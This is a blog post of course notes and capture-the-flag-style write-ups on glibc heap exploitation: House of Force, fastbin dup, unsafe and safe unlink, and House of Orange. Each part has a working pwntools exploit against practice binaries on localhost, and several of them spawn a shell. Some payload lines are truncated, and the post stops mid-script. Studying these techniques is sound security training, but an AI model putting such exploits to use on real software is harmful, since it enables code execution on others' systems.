2025-12-24
       Tags: pwn
       
       Table of Contents
       
       
       Below are some of  my notes and challenge writeups for Max Kamper's
       excellent Glibc malloc pwn course, HeapLAB [1].
       
       This  page  will  be  updated  with  more  challenges   in  the
       future.
       
       == House of Force
       
       
       This  technique  comes  from  Phantasmal   Phantasmagoria's  Malloc
       Maleficarum  [2], one  of  the most  seminal early works in  pwning
       Glibc  malloc  (and  the reason  so  many  heap exploits are called
       "House of XYZ").
       
       In Glibc,  malloc requests for  memory  are  serviced from the  top
       chunk (aka the wilderness).
       Because  heap  metadata is stored in-line  (the  size  of  a  chunk
       occupies the  first 8 bytes of every chunk, just before the address
       returned  from  `malloc`),  if  we  have a heap
       overflow we can clobber this  metadata and create a huge top chunk;
       so huge in  fact that it wraps around the virtual address space  to
       an address before the start of the top chunk.
       Then we can request a massive  chunk from  malloc  that stops  just
       short of our  target  address  such  that the first 8 bytes of  the
       (new) top chunk reside at the target address.
       Use  the  same heap overflow  as  before  and we've overwritten the
       target value!
       
       === Solve
       
       
       The vulnerability in this binary is that `read`
       uses    the   size    of   the    chunk    (returned    by
       `malloc_usable_size`),  not  the  size  of  the
       user's  data,  resulting  in  an  8  byte  overflow  if we  request
       `CHUNK_SIZE-8` bytes  from  malloc  (this  is the maximum
       size  of  user  data that  can  fit in  a  chunk  of  size
       `CHUNK_SIZE`).
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("house_of_force")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       proc.recvuntil(b"> ")
       
       info(f"heap: 0x{heap:02x}")
       proc.timeout = 0.5
       
       malloc(0x20-8, b"A"*(0x20-8) + p64(0xffffffffffffffff))
       # we're calculating the distance between the end of the previous chunk and the address exactly one chunk away (0x20 bytes) from __malloc_hook, so that the next chunk we allocate will overwrite __malloc_hook
       # also we have a heap leak so put /bin/sh on the heap
       malloc((libc.sym.__malloc_hook-0x20) - (heap+0x20), b"/bin/sh\x00")
       malloc(0x20-8, p64(libc.sym.system))
       # the size of the chunk gets passed to __malloc_hook, so we will allocate &"/bin/sh\x00" bytes
       malloc(heap+0x20+0x8+0x8, b"")
       
       proc.sendline(b"id")
       print(proc.recvall(timeout=0.1))
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == Fastbin dup
       
       
       This   time  the  vuln   is  a   nice  and   simple  double   free:
       `free` doesn't check if an index was previously
       freed, so we  can free a previously `malloc`​ed
       chunk as many times as we want.
       
       Before we move on let's  talk about in-band (stored on the heap) vs
       out-of-band (stored somewhere besides the heap) heap metadata.
       We saw previously  that  the size of a chunk is stored in the chunk
       itself, but how does `malloc` know  where  e.g.
       the top chunk is in order to service a request?
       A heap  arena is a data structure that does  all  of the  necessary
       bookkeeping for the heap, or more accurately a heap.
       When a  program has multiple  threads,  it would be  inefficient to
       have  to contend  for a lock  for every  allocation/free,  so  each
       thread  (up  to a limit) gets  their  own  slice of  the heap  (the
       section of program memory) governed by their own heap arena.
       struct malloc_state
       {
         /* Serialize access.  */
         __libc_lock_define (, mutex);
       
         /* Flags (formerly in max_fast).  */
         int flags;
       
         /* Set if the fastbin chunks contain recently inserted free blocks.  */
         /* Note this is a bool but not all targets support atomics on booleans.  */
         int have_fastchunks;
       
         /* Fastbins */
         mfastbinptr fastbinsY[NFASTBINS];
       
         /* Base of the topmost chunk -- not otherwise kept in a bin */
         mchunkptr top;
       
         /* The remainder from the most recent split of a small request */
         mchunkptr last_remainder;
       
         /* Normal bins packed as described above */
         mchunkptr bins[NBINS * 2 - 2];
       
         /* Bitmap of bins */
         unsigned int binmap[BINMAPSIZE];
       
         /* Linked list */
         struct malloc_state *next;
       
         /* Linked list for free arenas.  Access to this field is serialized
            by free_list_lock in arena.c.  */
         struct malloc_state *next_free;
       
         /* Number of threads attached to this arena.  0 if the arena is on
            the free list.  Access to this field is serialized by
            free_list_lock in arena.c.  */
         INTERNAL_SIZE_T attached_threads;
       
         /* Memory allocated from the system in this arena.  */
         INTERNAL_SIZE_T system_mem;
         INTERNAL_SIZE_T max_system_mem;
       };
       
       The important bit of metadata we care about here are the fastbins.
       As an optimization for  small (and therefore frequent) allocations,
       for chunk sizes within the first `NFASTBINS` multiples of
       the smallest chunk size, freeing a chunk of this size adds it to  a
       corresponding singly  linked  list  (and  the heads of these linked
       lists are stored in `fastbinsY`).
       And while  the heads of  the  linked lists are stored in the arena,
       subsequent pointers are stored in-line  in  the chunks  themselves,
       overlapping with where user data normally goes.
       
       I like to think of a chunk like this:
       struct fastbin_chunk_0x20 {
         union {
           struct {
             size_t _size : 61;
             unsigned int non_main_arena : 1;
             unsigned int is_mmapped : 1;
             unsigned int prev_inuse : 1;
           };
           size_t size;
         };
         union {
           struct {
             fastbin_chunk_0x20* fd;
             char _reserved[0x20-8-8];<<footnote(1)>>
           } free;
           struct {
             char data[0x20-8];
           } inuse;
         };
       };
       
       Combining this knowledge with our double free,  we could free chunk
       A  twice,  causing  it  to  be  added  to  the corresonding fastbin
       freelist twice; then  we could `malloc` chunk B
       of the same size as A, and the first 8 bytes of the user accessible
       data  of  chunk B  that  `malloc`  returns will
       still be interpreted  as a `fd` pointer for the
       next occurence of  chunk  A (the one that's  still  in the
       freelist).
       Then  we could  corrupt  this `fd` pointer  and
       when we allocate another chunk C, `malloc` will
       return a chunk at wherever  the corrupted  `fd`
       points.
       
       As  an  additional  complication,  we  can't actually just allocate
       chunk     A     and     then     free     it     twice,     because
       `malloc` checks  if the chunk  we're adding  to
       the freelist is the same chunk that's at the head of the freelist:
       size_t victim_idx = fastbin_index (chunksize (victim));
       if (__builtin_expect (victim_idx != idx, 0))
           malloc_printerr ("malloc(): memory corruption (fast)");
       
       This is trivially bypassed  by freeing a different chunk in between
       the two `free`​s of chunk A.
       
       === Solve
       
       
       There are a few complications to address when  actually writing the
       exploit.
       
       We  have  a  libc   leak  again  so  malloc   hooks   (particularly
       `__malloc_hook`                             and
       `__free_hook`) are viable targets.
       However,  because this  time we're allocating  a fake  chunk from a
       corrupted freelist pointer, the 16 bytes before our target  must be
       valid metadata for a freed chunk.
       
       `__free_hook` is surrounded by zeroes so it's a
       no-go,   but  `__malloc_hook`  is  a  different
       story:
 (IMG) image
       
       Instead of putzing around with finding a good  alignment ourselves,
       we can let pwndbg do it for us:
 (IMG) image
       
       But a size field of 0xf8 is larger than that of the largest chunk's
       fastbin (0x80).
       The  values  of  `_IO_wide_data_0+240`   differ
       between   my  aarch64-linux  NixOS  VM  (running  the  binary  with
       QEMU/Rosetta [3]) and the intended x86_64-linux  Ubuntu VM, so this
       approach won't work for my setup specifically.
       
       The same is also true for trying  FSOP, as we can't  create a  fake
       chunk in `__GI__IO_file_jumps`.
       
       We'll soon  discuss a very interesting method of  using the fastbin
       dupe   to  corrupt   `main_arena`'s   top_chunk
       pointer,  but that  requires  more allocations  than  the  7  we're
       permitted here, so we'll settle for overwriting the target for now.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("fastbin_dup")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.sendafter(b"Enter your username: ", p64(0x20))
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       proc.send(b"3")
       proc.recvline()
       print(proc.recvline())
       
       # 0x20 freelist: NULL
       malloc(0x20-8, b"A")
       malloc(0x20-8, b"B")
       free(0)
       # 0x20 freelist: [chunk A] -> NULL
       free(1)
       # 0x20 freelist: [chunk B] -> [chunk A] -> NULL
       free(0)
       # 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
       malloc(0x20-8, p64(elf.sym.user-8)) # chunk C
       # 0x20 freelist: [chunk B] -> [chunk A] -> &user
       malloc(0x20-8, b"D")
       # 0x20 freelist: [chunk A] -> &user
       malloc(0x20-8, b"E")
       # 0x20 freelist: &user
       malloc(0x20-8, b"F"*8 + b"pwned")
       
       proc.send(b"3")
       proc.recvline()
       print(proc.recvline())
       b'target: XXXXXXX\n'
       b'target: pwnedXX\n'
       
       === Challenge solve
       
       
       So     I    hinted    that    there's    a    way     to    corrupt
       `main_arena`'s top_chunk  pointer to achieve  a
       truly arbitrary write, and indeed we'll do just that.
       
       The basic idea is that we  have an arbitrary write over the fastbin
       head  pointers;  most values don't  point  to valid  freed  fastbin
       chunks and will therefore crash  during  the integrity checks  when
       allocating from  that  fastbin,  but what if  we used that value to
       create     a      fake     free      fastbin      cache      inside
       `main_arena`?
       Then  we  could   use   another   fastbin  dupe  to   clobber   the
       `top`  chunk   pointer,  which   is  convenient
       because allocations serviced from the top  chunk are not subject to
       the same strict size integrity checks as fastbin chunks!
       
       By  settings the  the  `top`  pointer  to  just
       before  `__malloc_hook` (with some misalignment
       introduced to ensure the fake top chunk has a valid size field), we
       can     jump    to    a    one_gadget    when    we    next    call
       `malloc`:
       one_gadget $(patchelf --print-rpath fastbin_dup_2)/libc.so.6
       0xc4dbf execve("/bin/sh", r13, r12)
       constraints:
         [r13] == NULL || r13 == NULL || r13 is a valid argv
         [r12] == NULL || r12 == NULL || r12 is a valid envp
       
       0xc4ddf execve("/bin/sh", rbp-0x40, r12)
       constraints:
         address rbp-0x38 is writable
         rdi == NULL || {"/bin/sh", rdi, NULL} is a valid argv
         [r12] == NULL || r12 == NULL || r12 is a valid envp
       
       0xc4de6 execve("/bin/sh", rbp-0x40, r12)
       constraints:
         address rbp-0x38 is writable
         rax == NULL || {rax, rdi, NULL} is a valid argv
         [r12] == NULL || r12 == NULL || r12 is a valid envp
       
       0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
       constraints:
         [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv
       
       As it  happens we control  the contents  of `[rsp+0x50]`,
       which we  can  set to  a  string  that  prevents  further  argument
       processing;     `"-s"`     does     the     trick     for
       `dash`​/​`bash`.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("fastbin_dup_2")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       one_gadget = libc.address + 0xe1fa1
       
       # 0x80 freelist: NULL
       malloc(0x20-8, b"A")
       malloc(0x20-8, b"B")
       free(0)
       # 0x20 freelist: [chunk A] -> NULL
       free(1)
       # 0x20 freelist: [chunk B] -> [chunk A] -> NULL
       free(0)
       # 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
       malloc(0x20-8, p64(0x60)) # chunk C
       # 0x20 freelist: [chunk B] -> [chunk A] -> 0x60
       malloc(0x20-8, b"D")
       # 0x20 freelist: [chunk A] -> 0x60
       malloc(0x20-8, b"E")
       # 0x20 freelist: 0x60
       
       malloc(0x60-8, b"F")
       malloc(0x60-8, b"G")
       free(5)
       # 0x60 freelist: [chunk F] -> NULL
       free(6)
       # 0x60 freelist: [chunk G] -> [chunk F] -> NULL
       free(5)
       # 0x60 freelist: [chunk F] -> [chunk G] -> [chunk F] -> NULL
       malloc(0x60-8, p64(libc.sym.main_arena+8)) # chunk H
       # 0x60 freelist: [chunk F] -> [chunk G] -> &main_arena
       malloc(0x60-8, b"-s\x00") # chunk I, lives at rsp+0x50 when __malloc_hook is executed
       # 0x60 freelist: [chunk G] -> &main_arena
       malloc(0x60-8, b"J")
       # 0x60 freelist: &main_arena
       malloc(0x60-8, b"\x00"*0x48 + p64(libc.sym.__malloc_hook-0x1c-8))
       # main_arena.top_chunk = &__malloc_hook-0x10
       malloc(0x80-8, b"L"*20 + p64(one_gadget)) # chunk L
       # __malloc_hook = &one_gadget
       malloc(0x2d, b"") # chunk M
       # __malloc_hook triggered
       
       proc.sendline("id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == Unsafe unlink
       
       
       When  a "normal"  chunk  is freed,  it is  added to the unsortedbin
       doubly linked list;  this behaves very  similarly to  the fastbins,
       except there's now an additional  `bk`  pointer
       stored after the `fd` pointer.
       
       But having a bunch of randomly  sized  chunks  in a freelist is not
       really ideal, as we'd like to be  able to reclaim  these chunks and
       use them for even larger allocations.
       Enter  chunk consolidation—when a chunk is freed, malloc will check
       if the  chunk's neighboring chunks are  also freed,  in which  case
       malloc will backwards and/or forwards consolidate the chunks into a
       single larger chunk.
       But a freed chunk is  still inside the unsortedbin  we talked about
       earlier, so  before  this consolidation  can  occur  malloc has  to
       unlink  one or more nodes from the unsortedbin linked  list (as the
       chunk being freed  is  merged  with one or both of  its neighboring
       chunks).
       
       In  older  versions of Glibc  this  linked  list unlinking was  not
       performed safely, so by corrupting  heap  chunks one could leverage
       this chunk consolidation  for  a (somewhat  constrained)  reflected
       write.[^fn:2]
       
       === Solve
       
       
       In  this  challenge we can  write  8  bytes  past the  end  of  our
       requested  size, which we can use  to corrupt the next chunk's size
       field and flags.
       
       By clearing chunk B's `prev_inuse` flag, we can
       convince  malloc that the  chunk before chunk  B (chunk A) is freed
       for the purposes of chunk consolidation when chunk B is freed.
       When we free chunk B,  malloc will attempt to  unlink chunk A  from
       the   unsortedbin  freelist  by   setting  `chunk_a.bk->fd   =
       chunk_a.fd`        and       `chunk_a.fd->bk       =
       chunk_a.bk`    (using    temporary    variables     where
       appropriate):
       #define unlink(AV, P, BK, FD) {\
           FD = P->fd;\
           BK = P->bk;\
           FD->bk = BK;\
           BK->fd = FD;\
           if (!in_smallbin_range (P->size)\
               && __builtin_expect (P->fd_nextsize != NULL, 0)) {\
                   if (FD->fd_nextsize == NULL) {\
                       if (P->fd_nextsize == P)\
                         FD->fd_nextsize = FD->bk_nextsize = FD;\
                       else {\
                           FD->fd_nextsize = P->fd_nextsize;\
                           FD->bk_nextsize = P->bk_nextsize;\
                           P->fd_nextsize->bk_nextsize = FD;\
                           P->bk_nextsize->fd_nextsize = FD;\
                       }\
                   } else {\
                       P->fd_nextsize->bk_nextsize = P->bk_nextsize;\
                       P->bk_nextsize->fd_nextsize = P->fd_nextsize;\
                   }\
           }\
       }
       
       With that in mind the exploit is pretty straightforward.
       Unfortunately I can't use the OG method of writing shellcode on the
       heap because in QEMU/Rosetta the heap isn't marked executable (even
       though the stack is—weird), and  we can't use  a one_gadget because
       Glibc `.text` isn't writable:
       [*] './unsafe_unlink'
           Arch:       amd64-64-little
           RELRO:      Full RELRO
           Stack:      Canary found
           NX:         NX unknown - GNU_STACK missing
           PIE:        PIE enabled
           Stack:      Executable
           RWX:        Has RWX segments
           RUNPATH:    b'../.glibc/glibc_2.23_unsafe-unlink'
           Stripped:   No
           Debuginfo:  Yes
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("unsafe_unlink")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.recvuntil(b"> ")
       
       def edit(index, data):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       shellcode = flat(
           asm("jmp .+18"),
           p64(0),
           p64(0),
           asm(shellcraft.amd64.linux.sh())
       )
       # start of the heap plus the size, fd, and bk fields of chunk A
       shellcode_addr = heap + 8 + 8 + 8 + 8
       
       malloc(0x3f0-8) # chunk A
       malloc(0x3f0-8) # chunk B
       edit(0, p64(libc.sym.__free_hook-0x18) + p64(shellcode_addr) + shellcode + b"A"*(0x3f0-8-8-len(shellcode)-8-8) + p64(0x3f0) + p64((0x3f0) & ~0b111...
       free(1) # trigger unlink of chunk A
       
       free(0) # trigger __free_hook
       
       proc.sendline(b"id")
       print(proc.recvall())
       
       == Safe unlink
       
       
       This is effectively the same as unsafe unlink, except now integrity
       checks have been introduced to  the  unlinking process that  thwart
       our previous approach:
       /* Take a chunk off a bin list.  */
       static void
       unlink_chunk (mstate av, mchunkptr p)
       {
         if (chunksize (p) != prev_size (next_chunk (p)))
           malloc_printerr ("corrupted size vs. prev_size");
       
         mchunkptr fd = p->fd;
         mchunkptr bk = p->bk;
       
         if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
           malloc_printerr ("corrupted double-linked list");
       
         fd->bk = bk;
         bk->fd = fd;
         if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
           {
             if (p->fd_nextsize->bk_nextsize != p
             || p->bk_nextsize->fd_nextsize != p)
           malloc_printerr ("corrupted double-linked list (not small)");
       
             if (fd->fd_nextsize == NULL)
           {
             if (p->fd_nextsize == p)
               fd->fd_nextsize = fd->bk_nextsize = fd;
             else
               {
                 fd->fd_nextsize = p->fd_nextsize;
                 fd->bk_nextsize = p->bk_nextsize;
                 p->fd_nextsize->bk_nextsize = fd;
                 p->bk_nextsize->fd_nextsize = fd;
               }
           }
             else
           {
             p->fd_nextsize->bk_nextsize = p->bk_nextsize;
             p->bk_nextsize->fd_nextsize = p->fd_nextsize;
           }
           }
       }
       
       Basically, the addresses we're writing to actually need to point to
       our chunk, which severely limits our options.
       But as it turns  out, `unlink_chunk`  can still
       be  leveraged for an arbitrary  write,  but  in a  way that's  very
       specific to our target binary.
       
       === Solve
       
       
       In    our     binary     there    exists    a    global    variable
       `m_array` that has pointers to the chunks we're
       allocating on the heap.
       
       We can craft a fake freed chunk A with `fd` and
       `bk`      pointers      that      point      to
       `m_array[0]`,  which  in  turn points  back  to
       chunk A, thus passing the integrity checks.
       As an additional complication  we can't  free chunk  A  as-is,  but
       that's fine—we can create a smaller fake  chunk within  chunk A and
       use that.
       
       This        has       the        effect        of        clobbering
       `m_array[0].user_data` to point to itself; when
       we  try  to  `edit`  chunk  A,  we're  actually
       editing `m_array[0]`.
       From           there           we           can           overwrite
       `m_array[0].user_data`     to     point      to
       `__free_hook`,  and  `edit`
       "chunk A" once more to write a one_gadget.
       
       Or so I thought, but as it turns out I couldn't satisfy any of  the
       conditions      of      the      one_gadgets,       even       with
       `rdi`​/​`[rdi]` or  `rax` control (by
       clobbering `m_chunk[1].user_data`).
       But  if   we  have   an  arbitrary   write,  we   can  just   write
       `"/bin/sh"` at  the  start  of  our  fake chunk  and  set
       `__free_hook`  to `system`,
       nice and simple.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("safe_unlink")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.recvuntil(b"> ")
       
       def edit(index, data):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       malloc(0xa0-8) # chunk A
       malloc(0x90-8) # chunk B
       edit(0, p64(0) + p64(0x91) + p64(elf.sym.m_array-0x18) + p64(elf.sym.m_array-0x10) + b"A"*(0x90-8-8-8-8) + p64(0x90) + ...
       free(1) # trigger unlink of chunk A
       # m_array[0].user_data = &m_array[0].user_data-0x18
       edit(0, b"\x00"*0x18 + p64(libc.sym.__free_hook - len(b"/bin/sh\x00")))
       # m_array[0].user_data = &__free_hook-8
       edit(0, b"/bin/sh\x00" + p64(libc.sym.system))
       free(0) # trigger __free_hook with address to "/bin/sh" as argument
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == House of Orange
       
       
       Fast  forward to 2016  when the House of  Orange [4] technique  was
       introduced at HITCON CTF Quals.
       This attack  is  a bit convoluted  as  it  relies on  internals  of
       `_IO_FILE` for a specific version of Glibc, but
       the  technique  has pedagogical  value for learning  FSOP  and  the
       unsortedbin attack.
       
       The prescient bit of information is that we  can  write the head of
       the       unsortedbin        (the        first        bin        in
       `main_arena.bins`)  freelist  to  an  arbitrary
       address,        where       `main_arena.bins[0]        ==
       &tail;_of_unsortedbin`.
       There doesn't seem to be an immediately obvious utility aside  from
       leaking a  libc address, but  we  can sneakily replace a  different
       linked list head in  Glibc with the head of  the unsortedbin linked
       list.
       
       The        big       non-heap        candidate       here        is
       `_IO_list_all`,  which  is  a  linked  list  of
       `_IO_FILE`       structures      for      stdio
       (stdin/stdout/stderr).
       In     a     similar      vein     to     the     malloc     hooks,
       `_IO_FILE`            (or           technically
       `_IO_FILE_plus`)  has  a  vtable  pointer  that
       could be clobbered,  and  just like  malloc  hooks, we can reliably
       trigger  execution  of   one  or  more  functions  in  this  vtable
       (`_IO_flush_all_lockp` will  traverse  all  the
       files  in   `_IO_list_all`   and  execute  each
       `_IO_FILE`'s   `__overflow`
       method;  we  can  trigger  this  by  intentionally  failing  a heap
       corruption  check,  which  will  `abort`  which
       eventually calls `_IO_flush_all_lockp`).
       struct _IO_FILE {
         int                  _flags;
         char *               _IO_read_ptr;
         char *               _IO_read_end;
         char *               _IO_read_base;
         char *               _IO_write_base;
         char *               _IO_write_ptr;
         char *               _IO_write_end;
         char *               _IO_buf_base;
         char *               _IO_buf_end;
         char *               _IO_save_base;
         char *               _IO_backup_base;
         char *               _IO_save_end;
         struct _IO_marker * _markers;
         struct _IO_FILE *   _chain;
         int                 _fileno;
         int                 _flags2;
         __off_t             _old_offset; // __off_t == long int
         unsigned short      _cur_column;
         signed char         _vtable_offset;
         char                _shortbuf[1];
         _IO_lock_t *        _lock;
       };
       
       struct _IO_FILE_complete {
         struct _IO_FILE _file;
         __off64_t       _offset;
         void *          __pad1;
         void *          __pad2;
         void *          __pad3;
         void *          __pad4;
         size_t          __pad5;
         int             _mode;
         char            _unused2[20];
       };
       
       struct _IO_jump_t {
         size_t           __dummy;
         size_t           __dummy2;
         /* these are all function pointers */
         _IO_finish_t     __finish;
         _IO_overflow_t   __overflow;
         _IO_underflow_t  __underflow;
         _IO_underflow_t  __uflow;
         _IO_pbackfail_t  __pbackfail;
         _IO_xsputn_t     __xsputn;
         _IO_xsgetn_t     __xsgetn;
         _IO_seekoff_t    __seekoff;
         _IO_seekpos_t    __seekpos;
         _IO_setbuf_t     __setbuf;
         _IO_sync_t       __sync;
         _IO_doallocate_t __doallocate;
         _IO_read_t       __read;
         _IO_write_t      __write;
         _IO_seek_t       __seek;
         _IO_close_t      __close;
         _IO_stat_t       __stat;
         _IO_showmanyc_t  __showmanyc;
         _IO_imbue_t      __imbue;
       };
       
       struct _IO_FILE_plus {
         struct _IO_FILE_complete  file;
         const struct _IO_jump_t * vtable;
       };
       
       === Solve
       
       
       There are three "phases" to our House of Orange attack  (phases two
       and  three  happen  at the  same time but I think  it's  helpful to
       mentally separate them):
       
       1.  Clobber top chunk's `size` field to a small
           page-aligned value and request  a  chunk larger  than  the  top
           chunk can service.
           This causes malloc to call `sbrk` for a new
           top chunk that can service the request,  and the  old top chunk
           is   added   to  the  unsortedbin   freelist  (it  doesn't  get
           extended/consolidated  because  the  new  top   chunk  is   not
           contiguous with the old one).
       2.  Overwrite the old  top chunk's `bk` pointer
           to 16 bytes before  `_IO_list_all`; when we
           next  request a chunk, `_IO_list_all`  will
           be clobbered with `main_arena.bins[0]-0x10`
           (aka the head of the unsortedbin freelist).
       3.  In   addition    to    overwriting    the   old   top   chunk's
           `bk`   pointer,  also   construct  a   fake
           `_IO_FILE_plus`    (and    stuff    in    a
           `_IO_jump_t` somewhere) that coincides with
           the old top chunk.
           There  will  be  a  few  very  basic checks  against  our  fake
           `_IO_FILE_plus`, so be sure to pass those.
           This  has the secondary  effect  of corrupting  the heap, which
           will                                                       call
           `(fake_filep->vtable.__overflow)(&fake_filep,
           -1)`;                                         because
           `fake_filep->vtable.__overflow`  is set  to
           `system` and `flags` is
           set to  `"/bin/sh"`  (`flags`  is
           the   first   member   of   `_IO_FILE`,  so
           `&fake_filep  == &fake_filep.flags`),  this
           calls `system("/bin/sh")`.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("house_of_orange")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size):
           if size == 0x18:
               proc.send(b"1")
           elif size == 0xfc0:
               proc.send(b"2")
           else:
               raise Exception("size must be 0xfc0 (large) or 0x18 (small)")
           proc.recvuntil(b"> ")
       
       def edit(data):
           if len(data) > 0xf0:
               raise Exception("data cannot be larger than 0xf0 bytes")
           proc.send(b"3")
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       fake_vtable = flat(
           p64(0),
           p64(0),
           p64(0xcafebabe),
           p64(libc.sym.system),
       )
       fake_filep = flat(
           b"/bin/sh\x00", # _flags / old_top_chunk.prev_size
           p64(0x60 | 0b1), # _IO_read_ptr / old_top_chunk.size
           p64(0),
           p64(libc.sym._IO_list_all-0x10), # old_top_chunk.bk
           p64(1), # _IO_write_base
           p64(2), # _IO_write_ptr
           fake_vtable,
           b"\x00"*(0xc0-0x30-len(fake_vtable)),
           p32(0), # _mode
           b"\x00"*20,
           p64(heap+0x20+0x30), # vtable
       )
       
       # phase 1: turn top chunk into a small chunk and add it to the unsortedbin
       malloc(0x20-8)
       edit(b"A"*0x18 + p64((0x1000-0x20) | 0b001)) # clobber top chunk's size
       malloc(0xfc0) # allocate a chunk large enough to brk a new top chunk and free the old one
       # unsortedbin: [old_top_chunk, size: 0xfc0, fd: &main_arena.bins[0], bk: &main_arena.bins[0]]
       
       # phase 3: fake _IO_FILE_plus with malicious vtable
       edit(b"A"*0x10 + fake_filep)
       # unsortedbin: [old_top_chunk, size: 0x18, fd: NULL, bk: &main_arena-0x10]
       # phase 2: unsortedbin attack to clobber _IO_list_all to point to fake _IO_FILE_plus
       malloc(0x20-8) # serviced from the unsortedbin, results in old_top_chunk.bk->fd = &old_top_chunk
       
       proc.sendline(b"id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       === Challenge solve
       
       
       There are two main differences from the previous challenge.
       
       First,  we can  only allocate chunks of size 0x60, so the  chunk we
       use for the unsortedbin attack  must  be of size 0x68 instead; this
       will   still   fit   in  the  0x60   smallbin,   but   will   avoid
       `_int_malloc`'s  fastpath that  avoids  binning
       when the chunk  in the  unsortedbin  is  an  exact  match  for  the
       requested size.
       /* Take now instead of binning if exact fit */
       
       if (size == nb)
       {
           set_inuse_bit_at_offset (victim, size);
           if (av != &main_arena)
           victim->size |= NON_MAIN_ARENA;
           check_malloced_chunk (av, victim, nb);
           void *p = chunk2mem (victim);
           alloc_perturb (p, bytes);
           return p;
       }
       
       Second,  instead  of  a  very generous  heap overflow  we can  only
       overflow the first byte of the next chunk's size field (and flags).
       Instead of clobbering the top  chunk's  size field like we did last
       time, we can allocate two chunks next  to  each  other, double  the
       first chunk's size, free this large chunk to put a 0xc0 sized chunk
       in  the unsortedbin freelist and finally allocate  a new 0x60 chunk
       to split the tail  of the  unsortedbin into two 0x60  sized  chunks
       (the first of which is used to service the request).
       This results in a UAF of  the  second  chunk, which  we  can use to
       clobber  unsortedbin  linked list  pointers  (and  ultimately  leak
       libc/heap pointers and perform an FSOP attack).
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("one_byte")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def calloc(size):
           if size != 0x58:
               raise Exception("size must be 0x58")
           proc.send(b"1")
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       def edit(index, data):
           if len(data) > 0x59:
               raise Exception("data cannot be larger than 0x59 bytes")
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def read(index):
           proc.send(b"4")
           proc.sendafter(b"index: ", f"{index}".encode())
